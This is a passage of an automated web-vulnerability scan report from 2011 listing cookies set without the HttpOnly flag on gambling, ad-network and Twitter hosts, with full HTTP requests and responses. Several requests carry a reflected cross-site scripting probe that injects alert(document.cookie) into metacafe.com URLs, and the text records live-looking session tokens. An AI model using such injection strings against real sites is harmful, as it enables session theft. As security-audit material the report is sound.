<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.88. http://www.primescratchcards.com.br/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.primescratchcards.com.br
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.primescratchcards.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24365
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: MTH=1072%2D100%2Dpt; expires=Wed, 15-Jun-2011 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ARC=140053; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=MKIMCHNDLBCPHFIMNELFEJOM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.89. http://www.vincite.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vincite.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=v0b5gg3j3lfm7o3fa7sric4bp6; path=/; domain=.vincite.net
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
Set-Cookie: winnings[subdomain]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[lang]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[sessionId]=103122908; path=/; domain=.vincite.net
Set-Cookie: winnings[vid]=540294; expires=Tue, 15-May-2012 12:02:13 GMT; path=/; domain=.vincite.net
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:02:14 GMT
Connection: close
Content-Length: 23217

<!DOCTYPE html>
<html dir="ltr" lang="it-IT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La prima destinazione per vincere divertendosi online!..| Winnings.com</title>
<link rel="alt
...[SNIP]...

12.90. http://www.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.winnings.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=4ghnev4ktomhtdlm6482aj6993; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 11:41:05 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 11:41:05 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103122734; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540130; expires=Tue, 15-May-2012 11:41:07 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 11:41:07 GMT
Content-Length: 24501

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - The #1 Destination for FUN Online Winnings Entertainment!..| Winnings.com</title>
<link rel=
...[SNIP]...

12.91. http://www.winnings.com/xmlrpc.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.winnings.com
Path:   /xmlrpc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xmlrpc.php HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=gpfb87spheemujmu5ahuq54h47; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[sessionId]=103123582; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540957; expires=Tue, 15-May-2012 12:35:10 GMT; path=/; domain=.winnings.com
Date: Mon, 16 May 2011 12:35:09 GMT
Connection: close
Content-Length: 42

XML-RPC server accepts POST requests only.

12.92. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0244.rm.bf1
Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux!1mR[!!!!#=!o!b!2$8S!!!!#<y'ui"; path=/; expires=Wed, 15-May-2013 12:52:16 GMT
Set-Cookie: vuday1=^cl!`NDf0(d)(<w; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=Y%rwY(3p6)LPwl1; path=/; expires=Mon, 16-May-2011 13:52:16 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:16 GMT
Pragma: no-cache
Content-Length: 5144
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

new function() {
this.rand = Math.floor((Math.random() + "") * 1000000000000);
this.dvparams = 'ctx=741233&cmp=5384441&plc=62171182&sid=1037707';
this.dvregion = '0';
this.tagsrc = '<IFRAME SRC="h
...[SNIP]...

12.93. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=706968&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.bigmoneyscratch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=c0ff5dec-7e12-11e0-9b08-cbf09fb9c5c1&_hmacv=1&_salt=1421878035&_keyid=k1&_hmac=379127292d98a559f1aee3132eca164a08138d6d; ih="b!!!!#!1mH9!!!!#=!i98"; vuday1=%)0sHNDf0(n(#JG; pv1="b!!!!#!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~"; lifb=@Aum6=mRs]u7k!H; bh="b!!!!j!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!$=!iJp!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#/h(!!!!(=!msk!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#6f-!!!!#=!iRq!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!$=!iR@!#b?f!!!!(=!msh!#b?y!!!!#=!dNx!#bBg!!!!#=!iRr!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!%=!iWP!#q4c!!!!$=!iWQ!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:41 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!k!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!$=!iJp!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#6f-!!!!#=!iRq!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!$=!iR@!#b?f!!!!(=!msh!#b?y!!!!#=!dNx!#bBg!!!!#=!iRr!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!%=!iWP!#q4c!!!!$=!iWQ!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; path=/; expires=Wed, 15-May-2013 11:41:41 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 11:41:41 GMT
Pragma: no-cache
Content-Length: 0
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close


12.94. http://affiliates.interwetten.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliates.interwetten.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: affiliates.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4rvtrm45hxdjs5axh0krts45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10237
Set-Cookie: BIGipServerPool_affiliates.interwetten.com=1727730092.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...

12.95. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/Metacafe/lists/metacafe/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

original_referer

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550175438=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550176-17470-26551
X-RateLimit-Limit: 150
ETag: "e5d1cb505007380f6115cd2151534fc1"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:49:36 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04505
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 13f34ed7cc97704ba4dad483c845028cdf545995
X-RateLimit-Reset: 1305553776
Set-Cookie: original_referer=ZLhHHTiegr%2BuELNlzhqsTmXCAErbgtcXGmlVl75vKClzAZioSrWmX1f0QknK5wh8oE41IPFgvC8H5lwFMcpBvsbGUrM2CLCfSyyLTsrrntY99PQJLtdZtZXzC2SKRGyfMlLDL2xkw2ifyAgy%2BYKs1A%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCbC2vgvAToHaWQiJTU3YWEwODgzYzhmNDJk%250AZWNjODAyY2IxOWMyZDIzYzEzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--bb094e11ffa55fe4d38d2f1900f6149571445d42; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35019

TWTR.Widget.receiveCallback_1([{"retweet_count":0,"in_reply_to_status_id":null,"text":"Raised in the circus, perpetually homeless, and always fabulous, meet one of pop's most dynamic rising stars. htt
...[SNIP]...

12.96. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=4000008&rn=856024745&c7=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ebe96a23f3a3%3D1&c15=0&c8=Metacafe%20-%20Online%20Video%20Entertainment%20-%20Free%20video&c9=http%3A%2F%2Fburp%2Fshow%2F19&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 12:49:29 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.97. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s
p

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_6670393876&pid=d6536fd1-a88d-43f5-b56c-d55966e08548&s=728x90&f=0.56&url=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cid=oxpv1%3A34-632-1929-1558-4408&hrid=b7d3130441279250d437d1e5dbea5016-1305550329 HTTP/1.1
Host: bid.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; p=1305468134

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=801a3d1e-777d-48cc-89cd-b6ac2981e332; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550332; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3POVLDMBQG4D924ihSIE
...[SNIP]...

12.98. http://br.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_12
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3hrlta45ydrtdn55kcs1yk45; path=/; HttpOnly
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:10:00 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: UniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.99. http://br.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_27
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
